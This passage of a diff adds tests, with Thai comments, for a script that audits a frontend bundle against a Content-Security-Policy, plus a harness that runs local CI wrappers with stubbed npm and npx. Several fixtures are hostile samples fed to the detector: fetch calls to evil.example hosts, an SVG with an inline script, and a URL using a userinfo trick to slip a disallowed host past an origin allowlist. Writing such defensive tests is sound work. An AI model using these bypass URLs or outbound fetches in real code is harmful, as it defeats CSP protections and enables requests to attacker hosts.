+    ...cleanFiles,
+    'index.html': '<!doctype html><html><body><button onclick="go()">x</button></body></html>',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.ok(rulesOf(findings).includes('inline-event-handler'), JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});
+
+test('eval( และ new Function( ต้องถูกจับ และผูกกับ script-src', () => {
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/bad-1.js': 'const f=()=>eval("1+1");',
+    'assets/bad-2.js': 'const g=new Function("return 1");',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    const dynamic = findings.filter((f) => f.rule === 'dynamic-code');
+    assert.equal(dynamic.length, 2, JSON.stringify(findings));
+    assert.ok(dynamic.every((f) => f.directive === 'script-src'));
+  } finally {
+    cleanup();
+  }
+});
+
+test('absolute URL ที่ policy ไม่อนุญาตต้องถูกจับ พร้อมบอก origin', () => {
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/api.js': 'fetch("https://smartport-backend.onrender.com/api/personnel");',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    const external = findings.filter((f) => f.rule === 'external-origin');
+    assert.equal(external.length, 1, JSON.stringify(findings));
+    assert.match(external[0].detail, /smartport-backend\.onrender\.com/);
+  } finally {
+    cleanup();
+  }
+});
+
+test('origin ที่ policy อนุญาตอยู่แล้วต้องไม่ถูกจับ (allowlist มาจาก policy ไม่ใช่ hardcode)', () => {
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/font.css': "@import url(https://fonts.googleapis.com/css2?family=X);",
+    'assets/font2.js': 'const u="https://fonts.gstatic.com/s/x.woff2";',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.deepEqual(findings, [], JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});
+
+test('URL ที่ไม่เคยถูก fetch (XML namespace / ลิงก์ในข้อความ) ต้องไม่ถูกจับ', () => {
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/svg.js': 'const NS="http://www.w3.org/2000/svg";const help="https://vuejs.org/error-reference/";',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.deepEqual(findings, [], JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});
+
+test('ข้อยกเว้นทุกตัวใน allowlist ต้องมีเหตุผลเขียนกำกับ (กันคนเติมเงียบ ๆ)', () => {
+  assert.ok(NON_FETCHED_ORIGINS.size > 0);
+  for (const [origin, reason] of NON_FETCHED_ORIGINS) {
+    assert.match(origin, /^https?:\/\//, `key ต้องเป็น origin เต็ม: ${origin}`);
+    assert.ok(
+      typeof reason === 'string' && reason.length >= 20,
+      `ข้อยกเว้น ${origin} ต้องมีเหตุผลอธิบายว่าทำไมถึงไม่ถูก fetch (ยาวพอจะเป็นประโยค)`
+    );
+  }
+});
+
+test('url() ภายนอกใน CSS ต้องถูกจับ', () => {
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'assets/bg.css': '.hero{background:url(https://cdn.example.com/bg.png)}',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.ok(rulesOf(findings).includes('external-origin'), JSON.stringify(findings));
+    assert.match(findings[0].detail, /cdn\.example\.com/);
+  } finally {
+    cleanup();
+  }
+});
+
+test('ไฟล์ font ใน dist ต้องถูกจับ เพราะ font-src ไม่มี self', () => {
+  // ความเสี่ยงข้อ 2 ที่ docs/frontend-security-headers.md เตือนไว้: ย้ายมา self-host font
+  // เมื่อไรจะพังทันทีทั้งที่ดูเหมือนแค่เปลี่ยน asset — gate นี้มีไว้จับตรงนั้น
+  const { dir, cleanup } = makeDist({ ...cleanFiles, 'assets/inter.woff2': 'binary' });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    const font = findings.filter((f) => f.rule === 'self-hosted-font');
+    assert.equal(font.length, 1, JSON.stringify(findings));
+    assert.equal(font[0].directive, 'font-src');
+  } finally {
+    cleanup();
+  }
+});
+
+test('ถ้า policy อนุญาต self ใน font-src แล้ว ไฟล์ font ต้องไม่ถูกจับ (กฎมาจาก policy จริง)', () => {
+  const { dir, cleanup } = makeDist({ ...cleanFiles, 'assets/inter.woff2': 'binary' });
+  try {
+    const relaxed = POLICY.replace("font-src https://fonts.gstatic.com", "font-src 'self' https://fonts.gstatic.com");
+    const { findings } = auditBundle(dir, relaxed);
+    assert.deepEqual(findings, [], JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});
+
+test('ถ้า policy อนุญาต unsafe-inline/unsafe-eval แล้ว กฎที่เกี่ยวข้องต้องไม่ฟ้อง', () => {
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'index.html': '<!doctype html><html><head><script>window.x=1</script></head><body></body></html>',
+    'assets/bad.js': 'eval("1");',
+  });
+  try {
+    const relaxed = POLICY.replace("script-src 'self'", "script-src 'self' 'unsafe-inline' 'unsafe-eval'");
+    const { findings } = auditBundle(dir, relaxed);
+    assert.deepEqual(findings, [], JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});
+
+test('dist ที่ไม่มีอยู่ต้อง throw — "ไม่ได้ตรวจ" ห้ามอ่านเป็น "ตรวจแล้วสะอาด"', () => {
+  assert.throws(() => auditBundle(join(tmpdir(), 'csp-audit-does-not-exist-xyz'), POLICY), /ไม่พบ|not found/i);
+});
+
+test('dist ที่ว่างเปล่าต้อง throw เช่นกัน (build ล้มเหลวเงียบ ๆ ไม่ใช่ bundle สะอาด)', () => {
+  const { dir, cleanup } = makeDist({});
+  try {
+    assert.throws(() => auditBundle(dir, POLICY), /ว่าง|empty/i);
+  } finally {
+    cleanup();
+  }
+});
+
+test('parseCspPolicy แตก directive ได้ถูกต้อง', () => {
+  const policy = parseCspPolicy(POLICY);
+  assert.deepEqual(policy.get('script-src'), ["'self'"]);
+  assert.deepEqual(policy.get('font-src'), ['https://fonts.gstatic.com']);
+  assert.deepEqual(policy.get('img-src'), ["'self'", 'data:']);
+  assert.equal(policy.has('report-uri'), true);
+});
+
+test('POLICY ที่เทสใช้ต้องตรงกับ render.yaml จริง (anti-drift)', () => {
+  // ถ้า production policy เปลี่ยนแล้วเทสยังใช้ค่าเก่า เทสจะเขียวบนกฎที่ไม่มีอยู่จริง
+  const entries = parseRenderHeaders(readFileSync(resolve(ROOT, 'render.yaml'), 'utf8'));
+  const live = entries.find((e) => e.name === 'Content-Security-Policy-Report-Only');
+  assert.ok(live, 'ไม่พบ CSP ใน render.yaml');
+  assert.equal(
+    live.value,
+    POLICY,
+    'policy ใน render.yaml เปลี่ยนแล้ว — อัปเดตค่า POLICY ในเทสนี้ให้ตรง แล้วทบทวนว่ากฎยังครอบครบไหม'
+  );
+});
+
+test('CLI: bundle สะอาด → exit 0, bundle มีปัญหา → exit 1 พร้อมบอกไฟล์', async () => {
+  const clean = makeDist(cleanFiles);
+  const dirty = makeDist({ ...cleanFiles, 'assets/bad.js': 'eval("1+1");' });
+  try {
+    const okRun = await runCli(['--dist', clean.dir]);
+    assert.equal(okRun.status, 0, okRun.output);
+    assert.match(okRun.output, /PASS/);
+
+    const badRun = await runCli(['--dist', dirty.dir]);
+    assert.equal(badRun.status, 1, badRun.output);
+    assert.match(badRun.output, /bad\.js/);
+    assert.match(badRun.output, /script-src/);
+  } finally {
+    clean.cleanup();
+    dirty.cleanup();
+  }
+});
+
+test('CLI: argument ที่ไม่รู้จักต้อง exit 1 ไม่ใช่ตรวจ dist ผิดที่เงียบ ๆ', async () => {
+  const { status, output } = await runCli(['--verbose']);
+  assert.equal(status, 1, output);
+  assert.match(output, /--verbose/);
+});
+
+function runCli(args) {
+  return new Promise((resolveRun, rejectRun) => {
+    const child = spawn(process.execPath, [SCRIPT, ...args], { cwd: ROOT });
+    let output = '';
+    child.stdout.on('data', (c) => (output += c));
+    child.stderr.on('data', (c) => (output += c));
+    const timer = setTimeout(() => {
+      child.kill();
+      rejectRun(new Error('audit-bundle-csp.mjs ไม่จบภายใน 60s'));
+    }, 60_000);
+    child.on('close', (code) => {
+      clearTimeout(timer);
+      resolveRun({ status: code, output });
+    });
+  });
+}

--- a/scripts/tests/audit-bundle-csp.test.mjs
+++ b/scripts/tests/audit-bundle-csp.test.mjs
@@ -48,12 +48,91 @@ function rulesOf(findings) {
   return findings.map((f) => f.rule).sort();
 }
 
-test('bundle สะอาดต้องไม่มี finding และต้องรายงานว่าตรวจกี่ไฟล์', () => {
+test('bundle สะอาดต้องไม่มี finding และต้องรายงานว่าอ่านเนื้อหากี่ไฟล์', () => {
   const { dir, cleanup } = makeDist(cleanFiles);
   try {
     const result = auditBundle(dir, POLICY);
     assert.deepEqual(result.findings, [], JSON.stringify(result.findings));
-    assert.equal(result.scanned, 3, 'ต้องตรวจครบทุกไฟล์ ไม่ใช่แค่ไฟล์แรก');
+    assert.equal(result.inspected, 3, 'ต้องอ่านเนื้อหาครบทุกไฟล์');
+    assert.equal(result.skipped.length, 0);
+  } finally {
+    cleanup();
+  }
+});
+
+test('ไฟล์ที่ไม่มีนามสกุล/นามสกุลไม่รู้จัก ต้องถูกอ่าน ไม่ใช่ข้ามเงียบ ๆ (code review C1)', () => {
+  // ของเดิมตรวจเฉพาะนามสกุลที่รู้จักแล้วข้ามที่เหลือ แต่ยังนับรวมในตัวเลข "ตรวจแล้ว N ไฟล์"
+  // ทำให้ `_redirects` (ไม่มีนามสกุล มี URL ของ backend) ไม่เคยถูกเปิดเลยทั้งที่ถูกนับ
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'weird-no-ext': 'fetch("https://evil.example.com/x")',
+    'data.json': '{"api":"https://evil2.example.com"}',
+    'icon.svg': '<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>',
+  });
+  try {
+    const { findings, inspected } = auditBundle(dir, POLICY);
+    assert.equal(inspected, 6, 'ทุกไฟล์ที่ไม่ใช่ binary ต้องถูกอ่าน');
+    const detail = findings.map((f) => f.detail).join(' | ');
+    assert.match(detail, /evil\.example\.com/, 'ไฟล์ไม่มีนามสกุลต้องถูกตรวจ');
+    assert.match(detail, /evil2\.example\.com/, 'ไฟล์ .json ต้องถูกตรวจ');
+    assert.ok(findings.some((f) => f.rule === 'inline-script'), 'inline <script> ใน .svg ต้องถูกจับ');
+  } finally {
+    cleanup();
+  }
+});
+
+test('ไฟล์ binary และไฟล์ที่ browser ไม่โหลด ต้องถูกข้ามพร้อมเหตุผทที่อ่านได้', () => {
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'sheet.xlsx': 'PK binary',
+    '_redirects': '/api/*  https://smartport-backend.onrender.com/:splat  200',
+  });
+  try {
+    const { findings, skipped, inspected } = auditBundle(dir, POLICY);
+    assert.deepEqual(findings, [], JSON.stringify(findings));
+    assert.equal(inspected, 3);
+    assert.equal(skipped.length, 2);
+    for (const s of skipped) {
+      assert.ok(s.reason && s.reason.length >= 20, `ไฟล์ที่ข้ามต้องมีเหตุผล: ${JSON.stringify(s)}`);
+    }
+  } finally {
+    cleanup();
+  }
+});
+
+test('directive ที่ซ้ำต้องใช้ตัวแรกเหมือน browser ไม่ใช่ตัวหลัง (code review I2)', () => {
+  // `script-src 'self'; script-src 'unsafe-eval'` → browser ใช้ตัวแรกและยังบล็อก eval
+  // ของเดิมใช้ Map.set ตรง ๆ จึงกลายเป็น last-wins = false PASS
+  const duplicated = POLICY.replace("script-src 'self';", "script-src 'self'; script-src 'unsafe-eval' 'unsafe-inline';");
+  assert.deepEqual(parseCspPolicy(duplicated).get('script-src'), ["'self'"]);
+
+  const { dir, cleanup } = makeDist({ ...cleanFiles, 'assets/bad.js': 'eval("1");' });
+  try {
+    const { findings } = auditBundle(dir, duplicated);
+    assert.ok(findings.some((f) => f.rule === 'dynamic-code'), 'ต้องยังฟ้อง eval เพราะ directive ตัวแรกคือ self');
+  } finally {
+    cleanup();
+  }
+});
+
+test('Function( ที่ไม่มี new ต้องถูกจับด้วย — เป็นสำนวนที่พบบ่อยกว่า (code review I1)', () => {
+  const { dir, cleanup } = makeDist({ ...cleanFiles, 'assets/poly.js': 'const g=Function("return this")();' });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.ok(findings.some((f) => f.rule === 'dynamic-code'), JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});
+
+test('inline event handler ที่ไม่มีเครื่องหมายคำพูดต้องถูกจับ (code review M2)', () => {
+  const { dir, cleanup } = makeDist({
+    ...cleanFiles,
+    'index.html': '<!doctype html><html><body><button onclick=go()>x</button></body></html>',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.ok(findings.some((f) => f.rule === 'inline-event-handler'), JSON.stringify(findings));
   } finally {
     cleanup();
   }
@@ -162,8 +241,10 @@ test('url() ภายนอกใน CSS ต้องถูกจับ', () => 
   });
   try {
     const { findings } = auditBundle(dir, POLICY);
-    assert.ok(rulesOf(findings).includes('external-origin'), JSON.stringify(findings));
-    assert.match(findings[0].detail, /cdn\.example\.com/);
+    // ใช้ .find() ไม่ใช่ findings[0] — ลำดับขึ้นกับ readdirSync ซึ่งเปลี่ยนได้เมื่อเปลี่ยนชื่อ fixture
+    const hit = findings.find((f) => /cdn\.example\.com/.test(f.detail));
+    assert.ok(hit, JSON.stringify(findings));
+    assert.equal(hit.rule, 'external-origin');
   } finally {
     cleanup();
   }

--- a/scripts/tests/audit-bundle-csp.test.mjs
+++ b/scripts/tests/audit-bundle-csp.test.mjs
@@ -1032,3 +1032,109 @@ test('attribute ที่เอกสารบอกว่าตรวจ ต้
     cleanup();
   }
 });
+
+// ── รีวิวรอบที่เจ็ด บนคอมมิต 22c84b7 (codex — reviewer คนละค่ายกับรอบที่หก) ─────
+// สองข้อ ทั้งคู่เป็น false clean ที่ยืนยันด้วยการรันแล้ว
+// ข้อแรกเป็นความผิดพลาดเดียวกับ review C1 ของรอบที่สอง แต่คนละเส้นทาง
+// ข้อหลังเป็นสมาชิกตัวที่สามของคลาส "ตัวคั่นที่อยู่ใน userinfo ได้"
+
+test('URL ใน attribute ที่บริบทบอก directive ได้ ต้องเทียบกับ directive นั้น ไม่ใช่ allowlist รวม (review ฐ)', () => {
+  // `fonts.gstatic.com` อยู่ใน font-src เท่านั้น — browser จะบล็อกทั้งสองเคสนี้จริง
+  // แต่ gate เทียบกับ allowlist รวมทุก directive จึงปล่อยผ่าน ซึ่งเป็นความผิดพลาดเดียวกับ
+  // review C1 ของรอบที่สอง (origin ที่อนุญาตไว้โหลดฟอนต์กลายเป็นใบผ่านให้โหลดอย่างอื่น)
+  // ต่างกันแค่รอบนั้นแก้เฉพาะเส้นทาง fetch() ส่วนเส้นทาง attribute ยังค้างอยู่
+  const cases = [
+    ['img.html', '<img src="//fonts.gstatic.com/x.png">', 'img-src'],
+    ['script.html', '<script src="//fonts.gstatic.com/x.js"></script>', 'script-src'],
+    ['obj.html', '<object data="//fonts.gstatic.com/x.swf"></object>', 'object-src'],
+  ];
+  for (const [name, markup, directive] of cases) {
+    const { dir, cleanup } = makeDist({
+      ...cleanFiles,
+      [name]: `<!doctype html><html><body>${markup}</body></html>`,
+    });
+    try {
+      const { findings } = auditBundle(dir, POLICY);
+      const hit = findings.find((f) => /fonts\.gstatic\.com/.test(f.detail));
+      assert.ok(hit, `${markup}: ${JSON.stringify(findings)}`);
+      assert.equal(hit.directive, directive, `${markup} ต้องรายงาน directive ที่บล็อกจริง`);
+    } finally {
+      cleanup();
+    }
+  }
+});
+
+test('`)` ก็อยู่ในส่วน userinfo ได้เหมือนตัวคั่นอื่น (review ฑ)', () => {
+  // รอบที่หกเอา `, ; ( { }` ออกจากตัวคั่นเพราะอยู่ใน userinfo ได้ แต่ **เก็บ `)` ไว้**
+  // เพราะมันปิด url() — โดยไม่ได้ตรวจว่า `)` ก็อยู่ใน userinfo ได้เหมือนกัน
+  // เป็นครั้งที่สามที่การแก้ของรอบก่อนหน้าเป็นตัวเปิดช่องใหม่
+  for (const allowed of ['fonts.gstatic.com', 'fonts.googleapis.com']) {
+    const { dir, cleanup } = makeDist({
+      ...cleanFiles,
+      'assets/paren.js': `const u = "https://${allowed})x@evil.example/steal";`,
+    });
+    try {
+      const { findings } = auditBundle(dir, POLICY);
+      assert.ok(
+        findings.some((f) => /evil\.example/.test(f.detail)),
+        `${allowed}: ${JSON.stringify(findings)}`
+      );
+    } finally {
+      cleanup();
+    }
+  }
+});
+
+test('url() หลายตัวยังต้องแยกครบ แม้เลิกใช้ `)` เป็นตัวคั่น (กันแก้เกิน)', () => {
+  // เหตุผลเดิมที่ `)` เป็นตัวคั่นคือกัน `url(a),url(b)` กลายเป็นก้อนเดียว
+  // การเลิกใช้มันจึงต้องไม่ทำให้ origin ตัวหลังหายไป
+  const { dir, cleanup } = makeDist({
+    'index.html': CLEAN_HTML,
+    'assets/index-abc.js': 'const a=1;export{a};',
+    'assets/multi.css': '.h{background:url(https://cdn1.example/a.png),url(https://cdn2.example/b.png)}',
+    'assets/three.css': '.i{background:url(https://cdn3.example/c.png),url(https://cdn4.example/d.png),url(https://cdn5.example/e.png)}',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    for (const origin of [/cdn1\./, /cdn2\./, /cdn3\./, /cdn4\./, /cdn5\./]) {
+      assert.ok(findings.some((f) => origin.test(f.detail)), `${origin}: ${JSON.stringify(findings)}`);
+    }
+  } finally {
+    cleanup();
+  }
+});
+
+test('attribute ที่ไม่ใช่ subresource หรือ directive ไม่ชัด ต้องไม่ถูกฟ้องเกินจริง (กันแก้เกิน)', () => {
+  // `<a href>` เป็นการ navigate ซึ่ง CSP ไม่คุมด้วย fetch directive · `<link rel=preconnect>`
+  // ไม่ได้โหลด subresource · `<link rel=stylesheet>` ไปที่ googleapis ซึ่ง style-src อนุญาตจริง
+  // ทั้งสามต้องเงียบ ไม่งั้นการปิดช่อง review ฐ จะกลายเป็นการฟ้องทุกอย่างแทน
+  const { dir, cleanup } = makeDist({
+    'index.html':
+      '<!doctype html><html><head>' +
+      '<link rel="stylesheet" href="//fonts.googleapis.com/css2?family=Inter">' +
+      '<link rel="preconnect" href="//fonts.gstatic.com">' +
+      '</head><body><a href="//fonts.gstatic.com/page">t</a></body></html>',
+    'assets/index-abc.js': 'const a=1;export{a};',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.deepEqual(findings, [], JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});
+
+test('font ที่โหลดจาก origin ที่ font-src อนุญาต ต้องไม่ถูกฟ้อง (กันแก้เกิน)', () => {
+  // คู่ตรงข้ามของ review ฐ: mapping ต้องอนุญาตของที่ policy อนุญาตจริงด้วย
+  const { dir, cleanup } = makeDist({
+    'index.html':
+      '<!doctype html><html><head><style>@font-face{src:url(https://fonts.gstatic.com/s/inter/v13/x.woff2)}</style></head><body></body></html>',
+    'assets/index-abc.js': 'const a=1;export{a};',
+  });
+  try {
+    const { findings } = auditBundle(dir, POLICY);
+    assert.deepEqual(findings, [], JSON.stringify(findings));
+  } finally {
+    cleanup();
+  }
+});

--- a/scripts/tests/ci-local-csp-gate.test.mjs
+++ b/scripts/tests/ci-local-csp-gate.test.mjs
@@ -1,0 +1,346 @@
+import assert from 'node:assert/strict';
+import { execFile, spawnSync } from 'node:child_process';
+import { chmodSync, copyFileSync, existsSync, mkdirSync, mkdtempSync, readFileSync, rmSync, writeFileSync } from 'node:fs';
+import { tmpdir } from 'node:os';
+import { delimiter, dirname, join, resolve } from 'node:path';
+import { describe, test } from 'node:test';
+import { fileURLToPath } from 'node:url';
+
+// Issue #113 (review รอบที่ 9, M1) — regression ของ **ตัว wrapper เอง** ซึ่งไม่เคยมีเทสเลย
+//
+// สิ่งที่ชุดนี้ปกป้อง: บรรทัด `OK  csp bundle audit` ต้องแปลว่า "ตรวจ bundle ของโค้ดปัจจุบัน
+// แล้วไม่เจอ" เท่านั้น · ของเดิมผูกบล็อก 1.5 กับ **การมีอยู่ของ dist** อย่างเดียว พอ build ล้ม
+// (ถูก catch ไว้แล้วไหลต่อ) dist ของรอบก่อนยังอยู่ audit จึงรันแล้วขึ้น OK — ตรวจของเก่า
+// แล้วรายงานว่าปัจจุบันสะอาด ซึ่งคือ failure mode ที่ทั้ง PR นี้มีไว้กันพอดี
+//
+// เทสรัน wrapper จริงใน workspace จำลอง: npm/npx ถูก shim ด้วย stub (ไม่มี network ไม่มี vite)
+// และ audit ถูกแทนด้วย stub ที่บันทึกว่าตัวเองถูกเรียกกี่ครั้ง — เราตรวจ "ถูกเรียกไหม" ไม่ใช่
+// "ผลลัพธ์ audit คืออะไร" ซึ่งเป็นหน้าที่ของ audit-bundle-csp.test.mjs
+
+const ROOT = resolve(dirname(fileURLToPath(import.meta.url)), '..', '..');
+const SH = resolve(ROOT, 'scripts', 'ci-local.sh');
+const PS1 = resolve(ROOT, 'scripts', 'ci-local.ps1');
+
+/**
+ * bash ที่รัน script ของ repo นี้ได้จริง
+ *
+ * บน Windows ต้อง **ไม่ใช่ WSL** (`System32\bash.exe`) เพราะ WSL มองไม่เห็น path แบบ `D:\…`
+ * ที่ทั้งเทสและ wrapper ใช้ · ไล่ candidate ของ Git for Windows ก่อน แล้วค่อยดู PATH
+ * (scoop/winget ติดตั้งไว้คนละที่) — ตรรกะเดียวกับ `Resolve-GitBash` ใน ci-local.ps1
+ */
+function resolveBash() {
+  if (process.platform !== 'win32') return 'bash';
+  const candidates = [
+    join(process.env.LOCALAPPDATA ?? '', 'Programs', 'Git', 'bin', 'bash.exe'),
+    'C:\\Program Files\\Git\\bin\\bash.exe',
+    'C:\\Program Files (x86)\\Git\\bin\\bash.exe',
+  ];
+  const found = candidates.find((c) => c && existsSync(c));
+  if (found) return found;
+  const where = spawnSync('where.exe', ['bash'], { encoding: 'utf8' });
+  return (
+    (where.stdout ?? '')
+      .split(/\r?\n/)
+      .map((line) => line.trim())
+      .filter(Boolean)
+      .find((p) => !/\\System32\\bash\.exe$/i.test(p)) ?? null
+  );
+}
+
+/** PowerShell ที่รันไฟล์ .ps1 ได้ — pwsh (7+) ก่อน แล้วค่อย Windows PowerShell */
+function resolvePwsh() {
+  for (const exe of ['pwsh', 'powershell']) {
+    const probe = spawnSync(exe, ['-NoProfile', '-Command', 'exit 0'], { encoding: 'utf8' });
+    if (!probe.error && probe.status === 0) return exe;
+  }
+  return null;
+}
+
+const BASH = resolveBash();
+const PWSH = resolvePwsh();
+
+/**
+ * ทางเข้าของ wrapper แต่ละตัว — วิธีเรียกและเหตุผลที่ข้ามอยู่ที่เดียวกัน
+ *
+ * ของเดิมแตกกิ่ง `shell === 'bash'` ไว้สองที่ (ตอนหาเหตุผลข้าม และตอนประกอบคำสั่ง) ซึ่งเพี้ยน
+ * ออกจากกันได้เงียบ ๆ · ตารางนี้ทำให้การเพิ่ม wrapper ตัวที่สามเป็นการเติมรายการเดียว
+ *
+ * `unavailable` = ข้อความบอกเหตุผล (ข้ามเทส) หรือ `false` เมื่อรันได้ — **ข้ามอย่างมีเสียงเสมอ**
+ * ci-local.ps1 เป็นทางเข้าฝั่ง Windows โดยตั้งใจ: ทั้งไฟล์ใช้ path แบบ `frontend\dist` และไล่หา
+ * Git Bash จาก `LOCALAPPDATA\Programs\Git` · pwsh มีบน ubuntu runner ก็จริง แต่ที่นั่น backslash
+ * เป็นตัวอักษรในชื่อไฟล์ ไม่ใช่ตัวคั่น การรันจึงวัดอะไรไม่ได้นอกจากความต่างของ OS — ฝั่งนี้ถูก
+ * บังคับรันจริงทุกครั้งที่ pre-push บนเครื่อง Windows ซึ่งเป็นที่เดียวที่มันมีความหมาย
+ */
+const WRAPPERS = {
+  bash: {
+    command: BASH,
+    unavailable: BASH === null ? 'ไม่พบ bash ที่ใช้ path แบบ Windows ได้ (WSL ใช้ไม่ได้)' : false,
+    // path สัมพัทธ์ทั้งสองฝั่ง — resolve จาก `cwd` ที่ตั้งไว้เป็น workspace อยู่แล้ว จึงไม่ต้อง
+    // ส่ง `dir` เข้ามา (ของเดิมฝั่ง bash รับไว้แล้วไม่ใช้ = พารามิเตอร์ตายในตารางที่ตั้งใจให้
+    // เป็นแหล่งความจริงเดียว) · วัดแล้วว่า `pwsh -File scripts/ci-local.ps1` resolve จาก cwd ได้
+    args: (skipFrontend) => [
+      'scripts/ci-local.sh',
+      '--skip-install',
+      '--skip-e2e',
+      '--skip-backend',
+      '--skip-docker',
+      ...(skipFrontend ? ['--skip-frontend'] : []),
+    ],
+  },
+  pwsh: {
+    command: PWSH,
+    unavailable:
+      process.platform !== 'win32'
+        ? 'ci-local.ps1 เป็น wrapper ฝั่ง Windows (path แบบ `\\`) — ตรวจบนเครื่อง Windows ผ่าน pre-push แทน'
+        : PWSH === null
+          ? 'ไม่พบ pwsh/powershell บนเครื่องนี้'
+          : false,
+    args: (skipFrontend) => [
+      '-NoProfile',
+      '-File',
+      'scripts/ci-local.ps1',
+      '-SkipInstall',
+      '-SkipE2E',
+      '-SkipBackend',
+      '-SkipDocker',
+      ...(skipFrontend ? ['-SkipFrontend'] : []),
+    ],
+  },
+};
+
+/**
+ * stub ของ `npm` / `npx` — บันทึกทุกการเรียกลง `cli-calls.log` แล้วจบด้วย exit 0
+ * (`npm … build` จบด้วย 1 เมื่อ `FIXTURE_BUILD_FAILS=1` เพื่อจำลอง build ล้ม)
+ *
+ * `node` **ไม่ถูก shim** — เคยลองแล้ววัดได้ว่าไม่คุ้ม: บน Windows การ spawn shell script
+ * ผ่าน MSYS แพงพอ ๆ กับ `node.exe` เอง (ทั้งชุดช้าลงจาก 2m0s เป็น 2m17s) แลกกับการเสีย
+ * ความสมจริงไปเปล่า ๆ · shebang เป็น `/bin/sh` ไม่ใช่ `/usr/bin/env bash` เพื่อไม่ต้อง
+ * spawn `env` เพิ่มอีกตัวต่อการเรียกหนึ่งครั้ง
+ */
+const CLI_SHIM = [
+  '#!/bin/sh',
+  'printf "%s\\n" "$(basename "$0") $*" >> "$(dirname "$0")/../cli-calls.log"',
+  'if [ "${FIXTURE_TEST_FAILS:-0}" = "1" ]; then',
+  '  case "$(basename "$0") $*" in npx*vitest*) exit 1 ;; esac',
+  'fi',
+  'if [ "${FIXTURE_BUILD_FAILS:-0}" = "1" ]; then',
+  '  case "$(basename "$0") $*" in npm*build*) exit 1 ;; esac',
+  'fi',
+  'exit 0',
+  '',
+].join('\n');
+
+/** stub เดียวกันสำหรับ PowerShell ซึ่ง resolve คำสั่งผ่าน PATHEXT (ต้องมีนามสกุล .cmd) */
+const CLI_SHIM_CMD = [
+  '@echo off',
+  '>>"%~dp0..\\cli-calls.log" echo %~n0 %*',
+  'if not "%FIXTURE_TEST_FAILS%"=="1" goto :buildcheck',
+  'if /i not "%~n0"=="npx" goto :buildcheck',
+  'echo %*| findstr /C:"vitest" >nul',
+  'if not errorlevel 1 exit /b 1',
+  ':buildcheck',
+  'if not "%FIXTURE_BUILD_FAILS%"=="1" exit /b 0',
+  'if /i not "%~n0"=="npm" exit /b 0',
+  'echo %*| findstr /C:"build" >nul',
+  'if errorlevel 1 exit /b 0',
+  'exit /b 1',
+  '',
+].join('\r\n');
+
+const SHIMMED_COMMANDS = ['npm', 'npx'];
+
+/**
+ * stub ของ audit — บันทึก **argv จริงที่ถูกเรียกด้วย** ไม่ใช่สตริงคงที่
+ *
+ * ถ้าเขียนค่าตายตัว log จะพิสูจน์ได้แค่ว่า "สคริปต์ถูกรัน" แต่บอกไม่ได้ว่า wrapper เรียกด้วย
+ * path อะไร ซึ่งไม่ตรงกับที่ `auditRunCount()` โฆษณาว่านับจากคำสั่งที่ถูกเรียก
+ */
+const AUDIT_STUB = [
+  "import { appendFileSync } from 'node:fs';",
+  "import { dirname, resolve } from 'node:path';",
+  "import { fileURLToPath } from 'node:url';",
+  'const here = dirname(fileURLToPath(import.meta.url));',
+  "appendFileSync(resolve(here, '..', 'cli-calls.log'), `node ${process.argv.slice(1).join(' ')}\\n`);",
+  '',
+].join('\n');
+
+/**
+ * workspace จำลองที่มีเฉพาะสิ่งที่ wrapper แตะจริง
+ *
+ * `ROOT` ของ wrapper ผูกกับตำแหน่งไฟล์ตัวเอง (`$PSScriptRoot/..`, `BASH_SOURCE/..`) จึง
+ * override ด้วย env ไม่ได้ — ต้อง copy ตัว wrapper ไปไว้ในโครงสร้างจำลองแทน
+ */
+function makeWorkspace({ dist }) {
+  const dir = mkdtempSync(join(tmpdir(), 'ci-local-gate-'));
+  mkdirSync(join(dir, 'scripts', 'tests'), { recursive: true });
+  mkdirSync(join(dir, 'bin'), { recursive: true });
+  mkdirSync(join(dir, 'frontend'), { recursive: true });
+
+  copyFileSync(SH, join(dir, 'scripts', 'ci-local.sh'));
+  copyFileSync(PS1, join(dir, 'scripts', 'ci-local.ps1'));
+  writeFileSync(join(dir, 'scripts', 'validate-schema-parity.mjs'), '// stub: parity ผ่านเสมอ\n');
+  writeFileSync(join(dir, 'scripts', 'audit-bundle-csp.mjs'), AUDIT_STUB);
+  writeFileSync(
+    join(dir, 'scripts', 'tests', 'stub.test.mjs'),
+    "import test from 'node:test';\ntest('stub regression', () => {});\n",
+  );
+
+  for (const name of SHIMMED_COMMANDS) {
+    const shim = join(dir, 'bin', name);
+    writeFileSync(shim, CLI_SHIM);
+    // จำเป็นบน POSIX: `writeFileSync` ให้ mode 644 ซึ่ง PATH lookup ข้ามไปเลย แล้ว shell จะ
+    // เดินไปเจอ npm/npx **ตัวจริง** แทน — เทสจะไม่พังตรง ๆ แต่ไปยิง registry ในโฟลเดอร์ fixture
+    // (วัดบน Linux แล้ว: mode 644 → `command -v npm` หา shim ไม่เจอ) · บน Windows แทบไม่มีผล
